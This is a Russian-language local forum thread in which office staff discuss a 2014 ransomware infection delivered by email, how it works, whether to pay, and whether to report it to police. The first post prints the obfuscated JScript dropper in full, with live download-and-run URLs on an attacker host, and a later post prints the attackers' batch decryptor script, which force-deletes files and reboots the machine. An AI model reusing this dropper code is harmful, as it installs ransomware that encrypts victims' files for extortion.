Перейти к содержанию
Муромский форум
Авторизация  
nagmc

Вирус С Шифрованием Файлов

Рекомендуемые сообщения

На 1 комп пришло на почту сообщение с изменением реквизитов, сотрудник запустил файл для просмотра, а там скрипт с шифрованием документов. В итоге имеем все зашифрованные документы (doc\xls\jpg), а для расшифровки просят заплатить денюжку, но я не уверен, что после оплаты проблема решится.
Текст скрипта:

Цитата
///////////////////////////////////
////// asdasda ////////////////////
///////////////////////////////////

function CreateObject(e){return new ActiveXObject(e)}function DWNDCRYPTO(a,cool.gif{b=WshShell.ExpandEnvironmentStrings(cool.gif;var c=WScript.CreateObject(_0xea96[3]);c[_0xea96[5]](_0xea96[4],a,!1);c[_0xea96[6]](null);var d=CreateObject(_0xea96[7]+_0xea96[8]);with(d)return Mode=3,Type=1,Open(),Write(c[_0xea96[9]]),SaveToFile(b,1),Close(),b}function Run(e){WshShell.Run(e,0,0)}var _0xea96='%TEMP%\\ WScript.Shell Scripting.FileSystemObject Msxml2.XMLhttp GET open send ADO DB.Stream responseBody http://moldowa.tw1.ru/document %TEMP%\\document.doc " document.doc" http://moldowa.tw1.ru/cde %TEMP%\\cde.cmd http://moldowa.tw1.ru/svchost %TEMP%\\svchost.cry http://moldowa.tw1.ru/iconv %TEMP%\\iconv.dll http://moldowa.tw1.ru/genkey %TEMP%\\genkey.cry http://moldowa.tw1.ru/secrypt %TEMP%\\secrypt.cry http://moldowa.tw1.ru/paycrypt %TEMP%\\paycrypt.cry cde.cmd" http://moldowa.tw1.ru/DECODE %TEMP%\\DECODE.zip http://moldowa.tw1.ru/javav %TEMP%\\javav.cry http://moldowa.tw1.ru/input1 %TEMP%\\input1.cry http://moldowa.tw1.ru/input2 %TEMP%\\input2.cry'.split(" "),DestinationFLE=_0xea96[0];var WshShell=CreateObject(_0xea96[1]),FSO=fso=CreateObject(_0xea96[2]);DWNDCRYPTO(_0
xea96[10],_0xea96[11]);try{Run(_0xea96[12]+DestinationFLE+_0xea96[13])}catch(e$$12){}DWNDCRYPTO(_0xea96[14],_0xea96[15]);DWNDCRYPTO(_0xea96[16],_0xea96[17]
);DWNDCRYPTO(_0xea96[18],_0xea96[19]);DWNDCRYPTO(_0xea96[20],_0xea96[21]);DWNDCR
Y
PTO(_0xea96[22],_0xea96[23]);DWNDCRYPTO(_0xea96[24],_0xea96[25]);Run(_0xea96[12]
+
DestinationFLE+_0xea96[26]);DWNDCRYPTO(_0xea96[27],_0xea96[28]);DWNDCRYPTO(_0xea
9
6[29],_0xea96[30]);DWNDCRYPTO(_0xea96[31],_0xea96[32]);DWNDCRYPTO(_0xea96[33],_0
x
ea96[34])


Инструкцию злоумышленников прилагаю, а также файлы, созданные "для расшифровки".
Есть какие-нибудь идеи с решением проблемы?
пс: антивирус аваст\авг пропускает скрипт "мимо ушей", каспер вроде поймал. Изменено пользователем nagmc

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

///оффтоп: нечего порнушку на работе смотреть:)
по теме: кто отправитель данного письма?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Цитата(CreativE @ 25.6.2014, 19:06)
///оффтоп: нечего порнушку на работе смотреть:)
по теме: кто отправитель данного письма?

Порнуха не при чем. Там комп древний - не потянет biggrin.gif
Отправитель - один из контрагентов, у них взломали почту и сделали рассылку. В письме было что-то вроде того:
Цитата
"С ***2014 изменились реквизиты (указаны в архиве), бла-бла-бла. С уважением ****, телефон***"

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

по теме:
1. осторожнее с DECODE.exe при запуске на незараженной машине. В некоторых модификациях трояна этот дешифровщик, запущенный на чистой машине шифрует все файлы.
2. к сожалению, модификаций данного трояна - великое множество, используют ассиметричные ключи для шифрования, ключ для деширования находится на сервере злоумышленника (т.е. в теле дешифровщика не содержится). Если в троне действительно используется RSA-1024 - дело довольно тухлое.
3. рекомендую пошустрить на форуме DrWeb - там время от времени появляются расшифровщики, но проблема в том, что большинство их них работают методом полного перебора.
4. Увы, но как правильно написано в той же инструкции, защита практически одна - "Еженедельное резервное копирование. Не открывайте подозрительные файлы. Используйте MAC OS". Вы не делаете резервных копий ваших важных файлов? Сочувствую.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Цитата(G-Host @ 25.6.2014, 19:27)
Вы не делаете резервных копий ваших важных файлов? Сочувствую.

Делаем, но как всегда, не в этом случае sad.gif
Так каков выход из ситуации? Пока что все "гугления" результата не дали.

В Белорусии вон тоже атакуют: http://tech.onliner.by/2014/06/25/virus-7

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Цитата(nagmc @ 25.6.2014, 19:56)
Так каков выход из ситуации? Пока что все "гугления" результата не дали.

Пока могу предложить лишь заплатить и надеяться. Или ждать появления расшифровщика.

P.S. Кстати, скрипт какой-то обрезанный. Присутствует часть для загрузки второго модуля трояна (первый - собственно шифрование, второй, судя по тенденциям - добыча bitcoin-ов), но после загрузки она на запуск не уходит. Ошибся. Спутал с другим шифровальщиком. Вторая часть занимается генерацией файла pw1.bin
P.P.S. Используется забавный способ проверки на зараженность - наличие файла "cpD.bin" в каталоге TEMP. содержимое файла не имеет значения.

Кратко пробежавшись по шифровальщику:
1. Шифруется при помощи программы gnuPG (кажется). Надёжно smile.gif
2. Ключи генерируются вроде как случайно, публичным ключом всё шифруется, приватный - отправляется на почту "paycrypt@gmail.com".
3. Если есть желание - пишите в милицию, Google и т.д. Судя по заявлениям Сноудена, все письма хранятся. Может, ключ восстановят.
4. Но можно поискать среди удаленных файлов (воспользуйтесь утилитами) файл pw1.bin в каталоге временных файлов. Он имеет отношение к ключу расшифровки. Изменено пользователем G-Host

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Цитата(G-Host @ 25.6.2014, 20:48)
4. Но можно поискать среди удаленных файлов (воспользуйтесь утилитами) файл pw1.bin в каталоге временных файлов. Он имеет отношение к ключу расшифровки.

Такого файла пока не нашел. Но нашел вот такой интересный файл:
Цитата
if not exist "%TEMP%\UNCRYPT.KEY" goto exit0
if exist "%TEMP%\paycrpt.bin" goto exit0
echo DCPT>"%TEMP%\paycrpt.bin"
attrib -s -h -r "%TEMP%\*.gpg"
del /f /q "%TEMP%\*.gpg"
del /f /q "%TEMP%\*.lock"
del /f /q "%TEMP%\*.cry"
del /f /q "%TEMP%\random_seed"
cd "%APPDATA%"
attrib -s -h -r "%APPDATA%\gnupg\*.*"
attrib -s -h -r "%APPDATA%\gnupg"
del /f /q "%APPDATA%\gnupg\*.*"
rmdir /s /q "%APPDATA%\gnupg"
cd "%TEMP%"
decrypt.exe --import "%TEMP%\UNCRYPT.KEY"
msg.exe Success! "Key FOUND! Close ALL applications and press OK. Hidden MODE! - Wait for REBOOT"
ping 127.0.0.1 -n 1
if exist B:\*.* for /r "B:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "B:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "B:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist C:\*.* for /r "C:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "C:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "C:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist D:\*.* for /r "D:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "D:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "D:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist E:\*.* for /r "E:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "E:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "E:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist F:\*.* for /r "F:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "F:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "F:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist G:\*.* for /r "G:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "G:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "G:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist H:\*.* for /r "H:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "H:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "H:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist I:\*.* for /r "I:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "I:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "I:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist J:\*.* for /r "J:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "J:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "J:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist K:\*.* for /r "K:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "K:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "K:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist L:\*.* for /r "L:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "L:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "L:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist M:\*.* for /r "M:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "M:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "M:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist N:\*.* for /r "N:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "N:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "N:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist O:\*.* for /r "O:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "O:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "O:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist P:\*.* for /r "P:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "P:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "P:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist Q:\*.* for /r "Q:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "Q:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "Q:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist R:\*.* for /r "R:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "R:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "R:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist S:\*.* for /r "S:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "S:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "S:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist T:\*.* for /r "T:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "T:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "T:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist U:\*.* for /r "U:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "U:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "U:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist V:\*.* for /r "V:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "V:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "V:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist W:\*.* for /r "W:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "W:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "W:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist X:\*.* for /r "X:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "X:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "X:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist Y:\*.* for /r "Y:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "Y:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "Y:%%~pi%%~ni.gpg">> paycrpt.bin)
if exist Z:\*.* for /r "Z:\" %%i IN (*.paycrypt@gmail_com) do (echo RENAME "%%~fi" "%%~ni.gpg">> paycrpt.bin) & (echo echo paycrypt^|decrypt.exe --batch --passphrase-fd 0 --no-verbose -q --decrypt-files "Z:%%~pi%%~ni.gpg">> paycrpt.bin) & (echo IF NOT ERRORLEVEL 2 del /f /q "Z:%%~pi%%~ni.gpg">> paycrpt.bin)
RENAME paycrpt.bin dweb.cmd
ping 127.0.0.1 -n 1
call dweb.cmd
attrib -s -h -r "%TEMP%"
attrib -s -h -r "%TEMP%\*.*"
del /f /q "C:\DECODE.zip"
del /f /q "D:\DECODE.zip"
del /f /q "%USERPROFILE%\Desktop\DECODE.zip"
del /f /q "%APPDATA%\Desktop\DECODE.zip"
del /f /q "C:\PAYCRYPT_GMAIL_COM.txt"
del /f /q "D:\PAYCRYPT_GMAIL_COM.txt"
del /f /q "%USERPROFILE%\Рабочий стол\PAYCRYPT_GMAIL_COM.txt"
del /f /q "%USERPROFILE%\Desktop\PAYCRYPT_GMAIL_COM.txt"
del /f /q "%PUBLIC%\Desktop\PAYCRYPT_GMAIL_COM.txt"
del /f /q "%APPDATA%\Desktop\PAYCRYPT_GMAIL_COM.txt"
del /f /q "%TEMP%\PAYCRYPT_GMAIL_COM.txt"
cd "%APPDATA%"
attrib -s -h -r "%APPDATA%\gnupg\*.*"
attrib -s -h -r "%APPDATA%\gnupg"
del /f /q "%APPDATA%\gnupg\*.*"
rmdir /s /q "%APPDATA%\gnupg"
cd "%TEMP%"
shutdown -r -t 0
del /f /q "%TEMP%\dweb.cmd"
del /f /q "%TEMP%\*.*"
del /f /q "%TEMP%\uncrypt.cmd"
del /f /q %0
:exit0
del /f /q "%TEMP%\decrypt.exe"
del /f /q "%TEMP%\iconv.dll"
del /f /q "%TEMP%\msg.exe"
del /f /q %0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ничего полезного в удаленных файлах не нашел, везде в интернете пишут, что без шансов взломать... походу придется платить.
Связался с ними по почте, назначили 7 тысяч рублей за дешифратор, в качестве подтверждения дешифратора прислали мне расшифрованный файл, который им отсылал. Стоит довериться и оплатить, ваше мнение?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Цитата(nagmc @ 26.6.2014, 18:57)
Стоит довериться и оплатить, ваше мнение?

Моё мнение - на текущий момент у вас выбора нет. Рекомендую поднять виртуальную машину, отключить на ней сеть, скопировать зашифрованные файлы туда, вместе с дешифровщиком и уже там производить дешифровку. По получению исходных файлов виртуальную машину уничтожить.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Заплатили 6800 за дешифратор, через час получили ключ и расшифровали файлы. В понедельник пойду за каспером biggrin.gif

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Цитата(nagmc @ 29.6.2014, 0:50)
Заплатили 6800 за дешифратор, через час получили ключ и расшифровали файлы. В понедельник пойду за каспером biggrin.gif

Каспер не панацея, один раз я лично отправлял в лабораторию "блокировщик", которого не было в базах и который на следующий день появился. Антивирус это лишь одно из звеньев организационных мер по защите.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Цитата(Э_L_A_Y @ 29.6.2014, 8:45)
Каспер не панацея, один раз я лично отправлял в лабораторию "блокировщик", которого не было в базах и который на следующий день появился. Антивирус это лишь одно из звеньев организационных мер по защите.

Это понятно конечно, но в данном случае на почту пришло на 2 компа, на котором был каспер всё ок, т.к вирус сразу определился, а вот с авастом всё оказалось плохо.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

тоже попался на эту удочку. пришлось платить(( повезло, что действительно прислали ключ, который работает. не попадайтесь...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Извиняюсь за глупый вопрос, а можно ли восстановить не зашифрованную часть файла?
Там же шифруется только начало файла, а остальное нормальное

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Злоумышленник пишет, что если фаилов больше 4000, то цена ключа будет стоить 0.035 евро за 1 фаил. Еще говорит, что дешифратор соединяется с их серверами и контролирует кол-во дешифрованных фаилов. Стоит верить и купить на 18000 филов или заплатить минимальную сумму в 140 евро?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Цитата(sasha2406 @ 1.7.2014, 10:17)
Извиняюсь за глупый вопрос, а можно ли восстановить не зашифрованную часть файла?
Там же шифруется только начало файла, а остальное нормальное

Нет, не получится. У нас почти все доки стали весит по 4Кб, вместо 30+ Кб положенных. Пробовал утилитами поиск удаленных делать, доки восстанавливаются криво - все напрасно.
Цитата(Varbar @ 1.7.2014, 18:09)
Злоумышленник пишет, что если файлов больше 4000, то цена ключа будет стоить 0.035 евро за 1 фаил. Еще говорит, что дешифратор соединяется с их серверами и контролирует кол-во дешифрованных фаилов. Стоит верить и купить на 18000 файлов или заплатить минимальную сумму в 140 евро?

Хм, ничего утверждать не могу, но в нашем случае также цена менялась. За 5тыс файлов просили 8тыс рублей (175евро), за 4тыс фалов 6800рублей, также говорили, что дешифратор сработает 1 раз и все, что свыше 4тыс файлов удалится. Мы удалили заведомо ненужные файлы (на всякий случай), вписались в 4 тыс, купили. Дешифрирование запустил с отключенной сетью - все прошло успешно, значит ни с каким сервером у нас не соединялось. Файлы дешифратора сохранились на компе, могу попробовать еще раз расшифровать, если интересно.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Цитата(nagmc @ 1.7.2014, 19:24)
Нет, не получится. У нас почти все доки стали весит по 4Кб, вместо 30+ Кб положенных. Пробовал утилитами поиск удаленных делать, доки восстанавливаются криво - все напрасно.

Хм, ничего утверждать не могу, но в нашем случае также цена менялась. За 5тыс файлов просили 8тыс рублей (175евро), за 4тыс фалов 6800рублей, также говорили, что дешифратор сработает 1 раз и все, что свыше 4тыс файлов удалится. Мы удалили заведомо ненужные файлы (на всякий случай), вписались в 4 тыс, купили. Дешифрирование запустил с отключенной сетью - все прошло успешно, значит ни с каким сервером у нас не соединялось. Файлы дешифратора сохранились на компе, могу попробовать еще раз расшифровать, если интересно.

поделились бы с народом дешивратором и какою модификацию расшифровывает Изменено пользователем ТДемон

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Цитата(ТДемон @ 1.7.2014, 23:05)
поделились бы с народом дешивратором и какою модификацию расшифровывает


Т. е. они заплатили деньги и должны с Вами бесплатно поделиться?
Да и к тому же, наврятли шифровальщики настолько глупы, что используют один и тот же алгоритм для всех своих операций шифрования.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Может мой вопрос покажется смешным, просьба не пинать.
У нас в городе в правоохранительных органах занимаются подобными преступлениями? По сути это криминал в чистом виде. Может надо было обратиться в органы, может как то бы нашли кого нибудь из этих рэкетиров. Может их давно хотят поймать, они уже немало народа кинули.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Цитата(ТДемон @ 1.7.2014, 23:05)
поделились бы с народом дешивратором и какою модификацию расшифровывает

Да без проблем (прикрепил), только вот проблема в том, что:
Цитата(G-Host @ 25.6.2014, 20:48)
Шифруется при помощи программы gnuPG (кажется). Надёжно smile.gif

Поэтому мой ключ подойдет только к моим зашифрованным файлам.
Если вы подкинете мой ключ к дешифратору на своем ПК, то после запуска дешифратора будут найдены все файлы с расширением *.PRYECRYPT_GMAIL_COM, далее у всех этих файлов изменится расширение на *.gpg, комп перезагрузится и всё...расшифровка не произойдет. То есть прежде, чем пробовать расшифровывать свои файлы чужими ключами, лучше сделать резерв копию своих файлов, ну или пробовать на другом ПК (виртуальной машине).

пс: если будете пробовать, то отпишитесь по результату.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Цитата(Oerby @ 1.7.2014, 23:24)
Может мой вопрос покажется смешным, просьба не пинать.
У нас в городе в правоохранительных органах занимаются подобными преступлениями? По сути это криминал в чистом виде. Может надо было обратиться в органы, может как то бы нашли кого нибудь из этих рэкетиров. Может их давно хотят поймать, они уже немало народа кинули.


Этим должен заниматься отдел "К", в крайнем случае ОБЭП, но найти их крайне сложно, особенно тут в глубинке, может ещё в Москве возможно, где правоохранительным органам доступны куда более лучшие технические средства, а тут этим даже заниматься никто не будет.
Не полагаете же Вы, что они сидят со статического ip какого-либо российского оператора и оттуда производят рассылку и оттуда высылают дешифровщик.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Цитата(UrZa @ 1.7.2014, 23:33)
Этим должен заниматься отдел "К", в крайнем случае ОБЭП, но найти их крайне сложно, особенно тут в глубинке, может ещё в Москве возможно, где правоохранительным органам доступны куда более лучшие технические средства, а тут этим даже заниматься никто не будет.
Не полагаете же Вы, что они сидят со статического ip какого-либо российского оператора и оттуда производят рассылку и оттуда высылают дешифровщик.

Я не знаю как они работают и работают ли вообще. Если такой отдел существует, думаю у них есть какая-то методика. Профи всё таки (должны быть).

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

делайте бэкап важных файлов в облако, тогда возможно и платить не нужно будет)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Цитата(Oerby @ 1.7.2014, 23:52)
Я не знаю как они работают и работают ли вообще. Если такой отдел существует, думаю у них есть какая-то методика. Профи всё таки (должны быть).


В том то и дело, что должны быть, а на деле далеко не так.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
Авторизация  

  • Последние посетители

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×